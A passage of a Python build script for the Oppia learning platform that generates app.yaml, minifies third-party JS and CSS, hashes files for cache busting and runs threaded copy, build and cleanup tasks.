MINIFIED_THIRD_PARTY_CSS_RELATIVE_FILEPATH = os.path.join(
'css', 'third_party.min.css')
WEBFONTS_RELATIVE_DIRECTORY_PATH = os.path.join('webfonts', '')
EXTENSIONS_DIRNAMES_TO_DIRPATHS = {
'dev_dir': os.path.join('extensions', ''),
'staging_dir': os.path.join('backend_prod_files', 'extensions', ''),
'out_dir': os.path.join('build', 'extensions', '')
}
TEMPLATES_DEV_DIR = os.path.join('templates', '')
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS = {
'dev_dir': os.path.join('core', 'templates', ''),
'staging_dir': os.path.join('backend_prod_files', 'templates', ''),
'out_dir': os.path.join('build', 'templates', '')
}
WEBPACK_DIRNAMES_TO_DIRPATHS = {
'staging_dir': os.path.join('backend_prod_files', 'webpack_bundles', ''),
'out_dir': os.path.join('build', 'webpack_bundles', '')
}
# This json file contains a json object. The object's keys are file paths and
# the values are the corresponding hash values. The paths need to be in posix
# style, since they are interpreted by the `url-interpolation` service, which
# treats the paths in this file as URLs.
HASHES_JSON_FILENAME = 'hashes.json'
HASHES_JSON_FILEPATH = os.path.join('assets', HASHES_JSON_FILENAME)
MANIFEST_FILE_PATH = os.path.join('manifest.json')
REMOVE_WS = re.compile(r'\s{2,}').sub
YUICOMPRESSOR_DIR = os.path.join(
os.pardir, 'oppia_tools', 'yuicompressor-2.4.8', 'yuicompressor-2.4.8.jar')
PARENT_DIR = os.path.abspath(os.path.join(os.getcwd(), os.pardir))
UGLIFY_FILE = os.path.join('node_modules', 'uglify-js', 'bin', 'uglifyjs')
WEBPACK_FILE = os.path.join('node_modules', 'webpack', 'bin', 'webpack.js')
WEBPACK_DEV_CONFIG = 'webpack.dev.config.ts'
WEBPACK_DEV_SOURCE_MAPS_CONFIG = 'webpack.dev.sourcemap.config.ts'
WEBPACK_PROD_CONFIG = 'webpack.prod.config.ts'
WEBPACK_PROD_SOURCE_MAPS_CONFIG = 'webpack.prod.sourcemap.config.ts'
WEBPACK_TERSER_CONFIG = 'webpack.terser.config.ts'
# Files with these extensions shouldn't be moved to build directory.
FILE_EXTENSIONS_TO_IGNORE = ('.py', '.pyc', '.stylelintrc', '.ts', '.gitkeep')
# Files with these name patterns shouldn't be moved to build directory, and will
# not be served in production. (This includes protractor.js files in
# /extensions.)
JS_FILENAME_SUFFIXES_TO_IGNORE = ('Spec.js', 'protractor.js')
JS_FILENAME_SUFFIXES_NOT_TO_MINIFY = ('.bundle.js',)
GENERAL_FILENAMES_TO_IGNORE = ('.pyc', '.stylelintrc', '.DS_Store')
JS_FILEPATHS_NOT_TO_BUILD = (
os.path.join(
'core', 'templates', 'expressions', 'parser.js'),
os.path.join('extensions', 'ckeditor_plugins', 'pre', 'plugin.js')
)
# These filepaths shouldn't be renamed (i.e. the filepath shouldn't contain
# hash).
# This is because these files don't need cache invalidation, are referenced
# from third party files or should not be moved to the build directory.
# Statically served pages from app.yaml should be here too, since they don't
# need cache invalidation.
FILEPATHS_NOT_TO_RENAME = (
'*.py',
'third_party/generated/js/third_party.min.js.map',
'third_party/generated/webfonts/*',
'*.bundle.js',
'*.bundle.js.map',
'webpack_bundles/*',
)
PAGES_IN_APP_YAML = (
'webpack_bundles/about-page.mainpage.html',
'webpack_bundles/contact-page.mainpage.html',
'webpack_bundles/donate-page.mainpage.html',
'webpack_bundles/get-started-page.mainpage.html',
'webpack_bundles/license.mainpage.html',
'webpack_bundles/login-page.mainpage.html',
'webpack_bundles/logout-page.mainpage.html',
'webpack_bundles/partnerships-page.mainpage.html',
'webpack_bundles/privacy-page.mainpage.html',
'webpack_bundles/playbook.mainpage.html',
'webpack_bundles/teach-page.mainpage.html',
'webpack_bundles/terms-page.mainpage.html',
'webpack_bundles/thanks-page.mainpage.html'
)
# NOTE: These pages manage user sessions. Thus, we should never reject or
# replace them when running in maintenance mode; otherwise admins will be unable
# to access the site.
AUTH_PAGE_PATHS = (
'webpack_bundles/login-page.mainpage.html',
'webpack_bundles/logout-page.mainpage.html',
)
# Hashes for files with these paths should be provided to the frontend in
# JS hashes object.
FILEPATHS_PROVIDED_TO_FRONTEND = (
'images/*', 'videos/*', 'i18n/*', '*.component.html',
'*_directive.html', '*.directive.html',
'*.template.html', '*.png', '*.json', '*.webp')
HASH_BLOCK_SIZE = 2**20
APP_DEV_YAML_FILEPATH = 'app_dev.yaml'
APP_YAML_FILEPATH = 'app.yaml'
_PARSER = argparse.ArgumentParser(
description="""
Creates a third-party directory where all the JS and CSS dependencies are
built and stored. Depending on the options passed to the script, might also
minify third-party libraries and/or generate a build directory.
""")
_PARSER.add_argument(
'--prod_env', action='store_true', default=False, dest='prod_env')
_PARSER.add_argument(
'--deploy_mode', action='store_true', default=False, dest='deploy_mode')
_PARSER.add_argument(
'--minify_third_party_libs_only', action='store_true', default=False,
dest='minify_third_party_libs_only')
_PARSER.add_argument(
'--deparallelize_terser',
action='store_true',
default=False,
dest='deparallelize_terser',
help='Disable parallelism on terser plugin in webpack. Use with prod_env.')
_PARSER.add_argument(
'--maintenance_mode',
action='store_true',
default=False,
dest='maintenance_mode',
help=(
'Enable maintenance mode, '
'meaning that only super admins can access the site.'
)
)
_PARSER.add_argument(
'--source_maps',
action='store_true',
default=False,
dest='source_maps',
help='Build webpack with source maps.')
def generate_app_yaml(deploy_mode=False, maintenance_mode=False):
"""Generate app.yaml from app_dev.yaml.
Args:
deploy_mode: bool. Whether the script is being called from deploy
script.
maintenance_mode: bool. Whether the site should be put into
maintenance mode.
"""
prod_file_prefix = 'build/'
maintenance_page_path = 'webpack_bundles/maintenance-page.mainpage.html'
content = '# THIS FILE IS AUTOGENERATED, DO NOT MODIFY\n'
with python_utils.open_file(APP_DEV_YAML_FILEPATH, 'r') as yaml_file:
content += yaml_file.read()
for file_path in PAGES_IN_APP_YAML:
if maintenance_mode and file_path not in AUTH_PAGE_PATHS:
content = content.replace(
file_path, prod_file_prefix + maintenance_page_path)
else:
content = content.replace(
file_path, prod_file_prefix + file_path)
if deploy_mode:
# The version: default line is required to run jobs on a local server (
# both in prod & non-prod env). This line is not required when app.yaml
# is generated during deployment. So, we remove this if the build
# process is being run from the deploy script.
content = content.replace('version: default', '')
# The FIREBASE_AUTH_EMULATOR_HOST environment variable is only needed to
# test locally, and MUST NOT be included in the deployed file.
content = re.sub(' FIREBASE_AUTH_EMULATOR_HOST: ".*"\n', '', content)
if os.path.isfile(APP_YAML_FILEPATH):
os.remove(APP_YAML_FILEPATH)
with python_utils.open_file(APP_YAML_FILEPATH, 'w+') as prod_yaml_file:
prod_yaml_file.write(content)
def modify_constants(
prod_env=False, emulator_mode=True, maintenance_mode=False):
"""Modify constants.ts and feconf.py.
Args:
prod_env: bool. Whether the server is started in prod mode.
emulator_mode: bool. Whether the server is started in emulator mode.
maintenance_mode: bool. Whether the site should be put into
the maintenance mode.
"""
dev_mode_variable = (
'"DEV_MODE": false' if prod_env else '"DEV_MODE": true')
common.inplace_replace_file(
common.CONSTANTS_FILE_PATH,
r'"DEV_MODE": (true|false)',
dev_mode_variable)
emulator_mode_variable = (
'"EMULATOR_MODE": true' if emulator_mode else '"EMULATOR_MODE": false')
common.inplace_replace_file(
common.CONSTANTS_FILE_PATH,
r'"EMULATOR_MODE": (true|false)',
emulator_mode_variable
)
enable_maintenance_mode_variable = (
'ENABLE_MAINTENANCE_MODE = %s' % python_utils.UNICODE(maintenance_mode))
common.inplace_replace_file(
common.FECONF_PATH,
r'ENABLE_MAINTENANCE_MODE = (True|False)',
enable_maintenance_mode_variable)
def set_constants_to_default():
"""Set variables in constants.ts and feconf.py to default values."""
modify_constants(prod_env=False, emulator_mode=True, maintenance_mode=False)
def _minify(source_path, target_path):
"""Runs the given file through a minifier and outputs it to target_path.
Args:
source_path: str. Absolute path to file to be minified.
target_path: str. Absolute path to location where to copy
the minified file.
"""
# The -Xmxn argument is an attempt to limit the max memory used when the
# minification process is running on CircleCI. Note that, from local
# experiments, 18m seems to work, but 12m is too small and results in an
# out-of-memory error.
# https://circleci.com/blog/how-to-handle-java-oom-errors/
# Use relative path to avoid java command line parameter parse error on
# Windows. Convert to posix style path because the java program requires
# the filepath arguments to be in posix path style.
target_path = common.convert_to_posixpath(
os.path.relpath(target_path))
source_path = common.convert_to_posixpath(
os.path.relpath(source_path))
yuicompressor_dir = common.convert_to_posixpath(YUICOMPRESSOR_DIR)
cmd = 'java -Xmx24m -jar %s -o %s %s' % (
yuicompressor_dir, target_path, source_path)
subprocess.check_call(cmd, shell=True)
def write_to_file_stream(file_stream, content):
"""Write to a file object using provided content.
Args:
file_stream: file. A stream handling object to do write operation on.
content: str. String content to write to file object.
"""
file_stream.write(python_utils.UNICODE(content))
def _join_files(source_paths, target_file_stream):
"""Writes multiple files into one file.
Args:
source_paths: list(str). Paths to files to join together.
target_file_stream: file. A stream object of target file.
"""
for source_path in source_paths:
with python_utils.open_file(source_path, 'r') as source_file:
write_to_file_stream(target_file_stream, source_file.read())
def _minify_and_create_sourcemap(source_path, target_file_path):
"""Minifies and generates source map for a JS file. This function is only
meant to be used with third_party.min.js.
Args:
source_path: str. Path to JS file to minify.
target_file_path: str. Path to location of the minified file.
"""
python_utils.PRINT('Minifying and creating sourcemap for %s' % source_path)
source_map_properties = 'includeSources,url=\'third_party.min.js.map\''
cmd = '%s %s %s -c -m --source-map %s -o %s ' % (
common.NODE_BIN_PATH, UGLIFY_FILE, source_path,
source_map_properties, target_file_path)
subprocess.check_call(cmd, shell=True)
def _generate_copy_tasks_for_fonts(source_paths, target_path):
"""Queue up a copy task for each font file.
Args:
source_paths: list(str). Paths to fonts.
target_path: str. Path where the fonts should be copied.
Returns:
deque(Thread). A deque that contains all copy tasks queued to be
processed.
"""
copy_tasks = collections.deque()
for font_path in source_paths:
copy_task = threading.Thread(
target=shutil.copy,
args=(font_path, target_path,))
copy_tasks.append(copy_task)
return copy_tasks
def _insert_hash(filepath, file_hash):
"""Inserts hash into filepath before the file extension.
Args:
filepath: str. Path where the hash should be inserted.
file_hash: str. Hash to be inserted into the path.
Returns:
str. Filepath with hash inserted.
"""
filepath, file_extension = os.path.splitext(filepath)
return '%s.%s%s' % (filepath, file_hash, file_extension)
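# Illustrative sketch (not part of the original build file): shows the effect of
# _insert_hash above on a made-up filepath and hash.
def _example_insert_hash():
    """Returns 'css/oppia.3f2a1b.css' for the hypothetical inputs below."""
    return _insert_hash('css/oppia.css', '3f2a1b')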
def ensure_directory_exists(filepath):
"""Ensures if directory tree exists, if not creates the directories.
Args:
filepath: str. Path to file located in directory that we want to ensure
exists.
"""
directory = os.path.dirname(filepath)
if not os.path.exists(directory):
os.makedirs(directory)
def safe_delete_directory_tree(directory_path):
"""Recursively delete a directory tree. If directory tree does not exist,
create the directories first then delete the directory tree.
Args:
directory_path: str. Directory path to be deleted.
"""
ensure_directory_exists(directory_path)
shutil.rmtree(directory_path)
def _ensure_files_exist(filepaths):
"""Ensures that files exist at the given filepaths.
Args:
filepaths: list(str). Paths to files that we want to ensure exist.
Raises:
OSError. One or more of the files does not exist.
"""
for filepath in filepaths:
if not os.path.isfile(filepath):
raise OSError('File %s does not exist.' % filepath)
def safe_copy_file(source_filepath, target_filepath):
"""Copy a file (no metadata) after ensuring the file exists at the given
source filepath.
    NOTE: shutil.copyfile does not accept directory paths as arguments.
Args:
source_filepath: str. Path to source file that we want to copy from.
target_filepath: str. Path to target file that we want to copy to.
"""
_ensure_files_exist([source_filepath])
shutil.copyfile(source_filepath, target_filepath)
def safe_delete_file(filepath):
"""Delete a file after ensuring the provided file actually exists.
Args:
filepath: str. Filepath to be deleted.
"""
_ensure_files_exist([filepath])
os.remove(filepath)
def get_file_count(directory_path):
"""Count total number of file in the given directory, ignoring any files
with extensions in FILE_EXTENSIONS_TO_IGNORE or files that should not be
built.
Args:
directory_path: str. Directory to be walked.
Returns:
int. Total number of files minus ignored files.
"""
total_file_count = 0
for root, _, filenames in os.walk(directory_path):
for filename in filenames:
# Ignore files with certain extensions.
filepath = os.path.join(root, filename)
if should_file_be_built(filepath) and not any(
filename.endswith(p) for p in FILE_EXTENSIONS_TO_IGNORE):
total_file_count += 1
return total_file_count
def _compare_file_count(
first_dir_list, second_dir_list):
"""Ensure that the total count of files in all directories in the first
list matches the count of files in all the directories in the second list.
Args:
first_dir_list: list(str). List of directories to compare.
second_dir_list: list(str). List of directories to compare.
Raises:
ValueError. The source directory list does not have the same file
count as the target directory list.
"""
file_counts = [0, 0]
for first_dir_path in first_dir_list:
file_counts[0] += get_file_count(first_dir_path)
for second_dir_path in second_dir_list:
file_counts[1] += get_file_count(second_dir_path)
if file_counts[0] != file_counts[1]:
python_utils.PRINT(
'Comparing %s vs %s' % (first_dir_list, second_dir_list))
raise ValueError(
'%s files in first dir list != %s files in second dir list' % (
file_counts[0], file_counts[1]))
def process_html(source_file_stream, target_file_stream):
"""Remove whitespaces and add hashes to filepaths in the HTML file stream
object.
Args:
source_file_stream: file. The stream object of the HTML file to be
read from.
target_file_stream: file. The stream object to write the minified HTML
file to.
"""
write_to_file_stream(
target_file_stream, REMOVE_WS(' ', source_file_stream.read()))
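# Illustrative sketch (not part of the original build file): process_html above
# relies on REMOVE_WS, which collapses runs of two or more whitespace characters
# into a single space. The HTML snippet below is a made-up example.
def _example_remove_ws():
    """Returns '<p>hi</p> <p>bye</p>' for the snippet below."""
    return REMOVE_WS(' ', '<p>hi</p>\n\n  <p>bye</p>')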
def get_dependency_directory(dependency):
"""Get dependency directory from dependency dictionary.
Args:
dependency: dict(str, str). Dictionary representing single dependency
from manifest.json.
Returns:
str. Dependency directory.
"""
if 'targetDir' in dependency:
dependency_dir = dependency['targetDir']
else:
dependency_dir = dependency['targetDirPrefix'] + dependency['version']
return os.path.join(THIRD_PARTY_STATIC_DIR, dependency_dir)
def get_css_filepaths(dependency_bundle, dependency_dir):
"""Gets dependency css filepaths.
Args:
dependency_bundle: dict(str, list(str) | str). The dict has three keys:
- 'js': List of paths to js files that need to be copied.
- 'css': List of paths to css files that need to be copied.
- 'fontsPath': Path to folder containing fonts that need to be
copied.
dependency_dir: str. Path to directory where the files that need to
be copied are located.
Returns:
list(str). List of paths to css files that need to be copied.
"""
css_files = dependency_bundle.get('css', [])
return [os.path.join(dependency_dir, css_file) for css_file in css_files]
def get_js_filepaths(dependency_bundle, dependency_dir):
"""Gets dependency js filepaths.
Args:
dependency_bundle: dict(str, list(str) | str). The dict has three keys:
- 'js': List of paths to js files that need to be copied.
- 'css': List of paths to css files that need to be copied.
- 'fontsPath': Path to folder containing fonts that need to be
copied.
dependency_dir: str. Path to directory where the files that need to
be copied are located.
Returns:
list(str). List of paths to js files that need to be copied.
"""
js_files = dependency_bundle.get('js', [])
return [os.path.join(dependency_dir, js_file) for js_file in js_files]
def get_font_filepaths(dependency_bundle, dependency_dir):
"""Gets dependency font filepaths.
Args:
dependency_bundle: dict(str, list(str) | str). The dict has three keys:
- 'js': List of paths to js files that need to be copied.
- 'css': List of paths to css files that need to be copied.
- 'fontsPath': Path to folder containing fonts that need to be
copied.
dependency_dir: str. Path to directory where the files that need to
be copied are located.
Returns:
list(str). List of paths to font files that need to be copied.
"""
if 'fontsPath' not in dependency_bundle:
# Skip dependency bundles in manifest.json that do not have
# fontsPath property.
return []
fonts_path = dependency_bundle['fontsPath']
# Obtain directory path to /font inside dependency folder.
# E.g. third_party/static/bootstrap-3.3.4/fonts/.
font_dir = os.path.join(dependency_dir, fonts_path)
font_filepaths = []
# Walk the directory and add all font files to list.
for root, _, filenames in os.walk(font_dir):
for filename in filenames:
font_filepaths.append(os.path.join(root, filename))
return font_filepaths
def get_dependencies_filepaths():
"""Extracts dependencies filepaths from manifest.json file into
a dictionary.
Returns:
dict(str, list(str)). A dict mapping file types to lists of filepaths.
The dict has three keys: 'js', 'css' and 'fonts'. Each of the
corresponding values is a full list of dependency file paths of the
given type.
"""
filepaths = {
'js': [],
'css': [],
'fonts': []
}
with python_utils.open_file(MANIFEST_FILE_PATH, 'r') as json_file:
manifest = json.loads(
json_file.read(), object_pairs_hook=collections.OrderedDict)
frontend_dependencies = manifest['dependencies']['frontend']
for dependency in frontend_dependencies.values():
if 'bundle' in dependency:
dependency_dir = get_dependency_directory(dependency)
filepaths['css'].extend(
get_css_filepaths(dependency['bundle'], dependency_dir))
filepaths['js'].extend(
get_js_filepaths(dependency['bundle'], dependency_dir))
filepaths['fonts'].extend(
get_font_filepaths(dependency['bundle'], dependency_dir))
_ensure_files_exist(filepaths['js'])
_ensure_files_exist(filepaths['css'])
_ensure_files_exist(filepaths['fonts'])
return filepaths
def minify_third_party_libs(third_party_directory_path):
"""Minify third_party.js and third_party.css and remove un-minified
files.
"""
third_party_js_filepath = os.path.join(
third_party_directory_path, THIRD_PARTY_JS_RELATIVE_FILEPATH)
third_party_css_filepath = os.path.join(
third_party_directory_path, THIRD_PARTY_CSS_RELATIVE_FILEPATH)
minified_third_party_js_filepath = os.path.join(
third_party_directory_path, MINIFIED_THIRD_PARTY_JS_RELATIVE_FILEPATH)
minified_third_party_css_filepath = os.path.join(
third_party_directory_path, MINIFIED_THIRD_PARTY_CSS_RELATIVE_FILEPATH)
_minify_and_create_sourcemap(
third_party_js_filepath, minified_third_party_js_filepath)
_minify(third_party_css_filepath, minified_third_party_css_filepath)
# Clean up un-minified third_party.js and third_party.css.
safe_delete_file(third_party_js_filepath)
safe_delete_file(third_party_css_filepath)
def build_third_party_libs(third_party_directory_path):
"""Joins all third party css files into single css file and js files into
single js file. Copies both files and all fonts into third party folder.
"""
python_utils.PRINT(
'Building third party libs at %s' % third_party_directory_path)
third_party_js_filepath = os.path.join(
third_party_directory_path, THIRD_PARTY_JS_RELATIVE_FILEPATH)
third_party_css_filepath = os.path.join(
third_party_directory_path, THIRD_PARTY_CSS_RELATIVE_FILEPATH)
webfonts_dir = os.path.join(
third_party_directory_path, WEBFONTS_RELATIVE_DIRECTORY_PATH)
dependency_filepaths = get_dependencies_filepaths()
ensure_directory_exists(third_party_js_filepath)
with python_utils.open_file(
third_party_js_filepath, 'w+') as third_party_js_file:
_join_files(dependency_filepaths['js'], third_party_js_file)
ensure_directory_exists(third_party_css_filepath)
with python_utils.open_file(
third_party_css_filepath, 'w+') as third_party_css_file:
_join_files(dependency_filepaths['css'], third_party_css_file)
ensure_directory_exists(webfonts_dir)
_execute_tasks(
_generate_copy_tasks_for_fonts(
dependency_filepaths['fonts'], webfonts_dir))
def build_using_webpack(config_path):
"""Execute webpack build process. This takes all TypeScript files we have in
    /templates and generates JS bundles according to the require() imports
and also compiles HTML pages into the /backend_prod_files/webpack_bundles
folder. The files are later copied into /build/webpack_bundles.
Args:
config_path: str. Webpack config to be used for building.
"""
python_utils.PRINT('Building webpack')
managed_webpack_compiler = servers.managed_webpack_compiler(
config_path=config_path, max_old_space_size=4096)
with managed_webpack_compiler as p:
p.wait()
def hash_should_be_inserted(filepath):
"""Returns if the file should be renamed to include hash in
the path.
Args:
filepath: str. Path relative to directory we are currently building.
Returns:
bool. True if filepath should contain hash else False.
"""
return not any(
fnmatch.fnmatch(filepath, pattern) for pattern
in FILEPATHS_NOT_TO_RENAME)
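# Illustrative sketch (not part of the original build file): the patterns in
# FILEPATHS_NOT_TO_RENAME are matched with fnmatch, so a webpack page keeps its
# name while a regular image gets a hash inserted. Both paths are examples.
def _example_hash_should_be_inserted():
    """Returns (False, True) for the two example paths below."""
    return (
        hash_should_be_inserted('webpack_bundles/about-page.mainpage.html'),
        hash_should_be_inserted('images/general/logo.png'))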
def should_file_be_built(filepath):
"""Determines if the file should be built.
- JS files: Returns False if filepath matches with pattern in
JS_FILENAME_SUFFIXES_TO_IGNORE or is in JS_FILEPATHS_NOT_TO_BUILD,
else returns True.
- Python files: Returns False if filepath ends with _test.py, else
returns True
- TS files: Returns False.
- Other files: Returns False if filepath matches with pattern in
GENERAL_FILENAMES_TO_IGNORE, else returns True.
Args:
filepath: str. Path relative to file we are currently building.
Returns:
bool. True if filepath should be built, else False.
"""
if filepath.endswith('.js'):
return all(
not filepath.endswith(p) for p in JS_FILENAME_SUFFIXES_TO_IGNORE)
elif filepath.endswith('_test.py'):
return False
elif filepath.endswith('.ts'):
return False
else:
return not any(
filepath.endswith(p) for p in GENERAL_FILENAMES_TO_IGNORE)
def generate_copy_tasks_to_copy_from_source_to_target(
source, target, file_hashes):
"""Generate copy task for each file in source directory, excluding files
with extensions in FILE_EXTENSIONS_TO_IGNORE. Insert hash from hash dict
into the destination filename.
Args:
source: str. Path relative to /oppia directory of directory
containing files and directories to be copied.
target: str. Path relative to /oppia directory of directory where
to copy the files and directories.
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
Returns:
deque(Thread). A deque that contains all copy tasks queued
to be processed.
"""
python_utils.PRINT('Processing %s' % os.path.join(os.getcwd(), source))
python_utils.PRINT('Copying into %s' % os.path.join(os.getcwd(), target))
copy_tasks = collections.deque()
for root, dirnames, filenames in os.walk(os.path.join(os.getcwd(), source)):
for directory in dirnames:
python_utils.PRINT('Copying %s' % os.path.join(root, directory))
for filename in filenames:
source_path = os.path.join(root, filename)
# Python files should not be copied to final build directory.
if not any(
source_path.endswith(p) for p in FILE_EXTENSIONS_TO_IGNORE):
target_path = source_path
# The path in hashes.json file is in posix style,
# see the comment above HASHES_JSON_FILENAME for details.
relative_path = common.convert_to_posixpath(
os.path.relpath(source_path, source))
if (hash_should_be_inserted(source + relative_path) and
relative_path in file_hashes):
relative_path = (
_insert_hash(relative_path, file_hashes[relative_path]))
target_path = os.path.join(os.getcwd(), target, relative_path)
ensure_directory_exists(target_path)
copy_task = threading.Thread(
target=safe_copy_file,
args=(source_path, target_path,))
copy_tasks.append(copy_task)
return copy_tasks
def is_file_hash_provided_to_frontend(filepath):
"""Returns if the hash for the filepath should be provided to the frontend.
Args:
filepath: str. Relative path to the file.
Returns:
bool. True if file hash should be provided to the frontend else False.
"""
return any(
fnmatch.fnmatch(filepath, pattern) for pattern
in FILEPATHS_PROVIDED_TO_FRONTEND)
def generate_md5_hash(filepath):
"""Returns md5 hash of file.
Args:
filepath: str. Absolute path to the file.
Returns:
str. Hexadecimal hash of specified file.
"""
m = hashlib.md5()
with python_utils.open_file(filepath, 'rb', encoding=None) as f:
while True:
buf = f.read(HASH_BLOCK_SIZE)
if not buf:
break
m.update(buf)
return m.hexdigest()
def get_filepaths_by_extensions(source_dir, file_extensions):
"""Return list of filepaths in a directory with certain extensions,
excluding filepaths that should not be built.
Args:
source_dir: str. Root directory to be walked.
file_extensions: tuple(str). Tuple of file extensions.
Returns:
list(str). List of filepaths with specified extensions.
"""
filepaths = []
for root, _, filenames in os.walk(source_dir):
for filename in filenames:
filepath = os.path.join(root, filename)
relative_filepath = os.path.relpath(filepath, source_dir)
if should_file_be_built(filepath) and any(
filename.endswith(p) for p in file_extensions):
filepaths.append(relative_filepath)
return filepaths
def get_file_hashes(directory_path):
"""Returns hashes of all files in directory tree, excluding files with
extensions in FILE_EXTENSIONS_TO_IGNORE or files that should not be built.
Args:
directory_path: str. Root directory of the tree.
Returns:
dict(str, str). Dictionary with keys specifying file paths and values
specifying file hashes.
"""
file_hashes = dict()
python_utils.PRINT(
'Computing hashes for files in %s'
% os.path.join(os.getcwd(), directory_path))
for root, _, filenames in os.walk(
os.path.join(os.getcwd(), directory_path)):
for filename in filenames:
filepath = os.path.join(root, filename)
if should_file_be_built(filepath) and not any(
filename.endswith(p) for p in FILE_EXTENSIONS_TO_IGNORE):
# The path in hashes.json file is in posix style,
# see the comment above HASHES_JSON_FILENAME for details.
complete_filepath = common.convert_to_posixpath(
os.path.join(root, filename))
relative_filepath = common.convert_to_posixpath(os.path.relpath(
complete_filepath, directory_path))
file_hashes[relative_filepath] = generate_md5_hash(
complete_filepath)
return file_hashes
def filter_hashes(file_hashes):
"""Filters hashes that should be provided to the frontend
and prefixes "/" in front of the keys.
Args:
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
Returns:
dict(str, str). Filtered dictionary of only filepaths that should be
provided to the frontend.
"""
filtered_hashes = dict()
for filepath, file_hash in file_hashes.items():
if is_file_hash_provided_to_frontend(filepath):
filtered_hashes['/' + filepath] = file_hash
return filtered_hashes
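# Illustrative sketch (not part of the original build file): filter_hashes above
# keeps only paths matching FILEPATHS_PROVIDED_TO_FRONTEND and prefixes them with
# '/'. The paths and hash values below are made up.
def _example_filter_hashes():
    """Returns {'/images/general/logo.png': 'abc123'} for the input below."""
    return filter_hashes({
        'images/general/logo.png': 'abc123',
        'scripts/run_build.py': 'def456',
    })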
def save_hashes_to_file(file_hashes):
"""Return JS code that loads hashes needed for frontend into variable.
Args:
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
Returns:
str. JS code loading hashes as JSON into variable.
"""
# Only some of the hashes are needed in the frontend.
filtered_hashes = filter_hashes(file_hashes)
ensure_directory_exists(HASHES_JSON_FILEPATH)
with python_utils.open_file(HASHES_JSON_FILEPATH, 'w+') as hashes_json_file:
hashes_json_file.write(
python_utils.UNICODE(
json.dumps(filtered_hashes, ensure_ascii=False)))
hashes_json_file.write(u'\n')
def minify_func(source_path, target_path, filename):
"""Call the appropriate functions to handle different types of file
formats:
    - HTML files: Remove whitespace, interpolate paths in the HTML to include
      hashes from the source directory, and save the edited file at the target
      directory.
- CSS or JS files: Minify and save at target directory.
- Other files: Copy the file from source directory to target directory.
"""
skip_minify = any(
filename.endswith(p) for p in JS_FILENAME_SUFFIXES_NOT_TO_MINIFY)
if filename.endswith('.html'):
python_utils.PRINT('Building %s' % source_path)
with python_utils.open_file(source_path, 'r+') as source_html_file:
with python_utils.open_file(
target_path, 'w+') as minified_html_file:
process_html(source_html_file, minified_html_file)
elif ((filename.endswith('.css') or filename.endswith('.js')) and
not skip_minify):
python_utils.PRINT('Minifying %s' % source_path)
_minify(source_path, target_path)
else:
python_utils.PRINT('Copying %s' % source_path)
safe_copy_file(source_path, target_path)
def _execute_tasks(tasks, batch_size=24):
"""Starts all tasks and checks the results.
Runs no more than 'batch_size' tasks at a time.
"""
remaining_tasks = collections.deque(tasks)
currently_running_tasks = []
while remaining_tasks or currently_running_tasks:
if currently_running_tasks:
for task in collections.deque(currently_running_tasks):
if not task.is_alive():
currently_running_tasks.remove(task)
while remaining_tasks and len(currently_running_tasks) < batch_size:
task = remaining_tasks.popleft()
currently_running_tasks.append(task)
try:
task.start()
except RuntimeError:
raise OSError('threads can only be started once')
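# Illustrative sketch (not part of the original script): the batching pattern
# implemented by _execute_tasks, exercised with toy threads. Each task is an
# unstarted threading.Thread; _execute_tasks starts at most batch_size of them
# at a time and only starts more as the running ones finish.
def _demo_execute_tasks_batching():
    """Runs three trivial build-like tasks, at most two at a time."""
    toy_tasks = collections.deque(
        threading.Thread(
            target=python_utils.PRINT,
            args=('Pretending to build %s' % name,))
        for name in ('a.html', 'b.css', 'c.js'))
    _execute_tasks(toy_tasks, batch_size=2)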
def generate_build_tasks_to_build_all_files_in_directory(source, target):
"""This function queues up tasks to build all files in a directory,
excluding files that should not be built.
Args:
source: str. Path relative to /oppia of directory containing source
files and directories to be built.
target: str. Path relative to /oppia of directory where the built files
and directories will be saved to.
Returns:
deque(Thread). A deque that contains all build tasks queued
to be processed.
"""
python_utils.PRINT('Processing %s' % os.path.join(os.getcwd(), source))
python_utils.PRINT('Generating into %s' % os.path.join(os.getcwd(), target))
build_tasks = collections.deque()
for root, dirnames, filenames in os.walk(os.path.join(os.getcwd(), source)):
for directory in dirnames:
python_utils.PRINT(
'Building directory %s' % os.path.join(root, directory))
for filename in filenames:
source_path = os.path.join(root, filename)
target_path = source_path.replace(source, target)
ensure_directory_exists(target_path)
if should_file_be_built(source_path):
task = threading.Thread(
target=minify_func,
args=(source_path, target_path, filename,))
build_tasks.append(task)
return build_tasks
def generate_build_tasks_to_build_files_from_filepaths(
source_path, target_path, filepaths):
"""This function queues up build tasks to build files from a list of
filepaths, excluding files that should not be built.
Args:
source_path: str. Path relative to /oppia directory of directory
containing files and directories to be copied.
target_path: str. Path relative to /oppia directory of directory where
to copy the files and directories.
filepaths: list(str). List of filepaths to be built.
Returns:
deque(Thread). A deque that contains all build tasks queued
to be processed.
"""
build_tasks = collections.deque()
for filepath in filepaths:
source_file_path = os.path.join(source_path, filepath)
target_file_path = os.path.join(target_path, filepath)
ensure_directory_exists(target_file_path)
if should_file_be_built(source_file_path):
task = threading.Thread(
target=minify_func,
args=(
source_file_path, target_file_path, filepath,))
build_tasks.append(task)
return build_tasks
def generate_delete_tasks_to_remove_deleted_files(
source_dir_hashes, staging_directory):
"""This function walks the staging directory and queues up deletion tasks to
remove files that are not in the hash dict i.e. remaining files in staging
directory that have since been deleted from source directory. Files with
extensions in FILE_EXTENSIONS_TO_IGNORE will be excluded.
Args:
source_dir_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
staging_directory: str. Path relative to /oppia directory of directory
containing files and directories to be walked.
Returns:
deque(Thread). A deque that contains all delete tasks
queued to be processed.
"""
python_utils.PRINT(
        'Scanning directory %s to remove deleted files' % staging_directory)
delete_tasks = collections.deque()
for root, _, filenames in os.walk(
os.path.join(os.getcwd(), staging_directory)):
for filename in filenames:
target_path = os.path.join(root, filename)
# Ignore files with certain extensions.
if not any(
target_path.endswith(p) for p in FILE_EXTENSIONS_TO_IGNORE):
                # On Windows the path is in Windows style, while the paths in
                # the hash dict are in posix style, so we need to convert it
                # for the check to run correctly.
relative_path = common.convert_to_posixpath(
os.path.relpath(target_path, staging_directory))
# Remove file found in staging directory but not in source
# directory, i.e. file not listed in hash dict.
if relative_path not in source_dir_hashes:
python_utils.PRINT(
'Unable to find %s in file hashes, deleting file'
% target_path)
task = threading.Thread(
target=safe_delete_file, args=(target_path,))
delete_tasks.append(task)
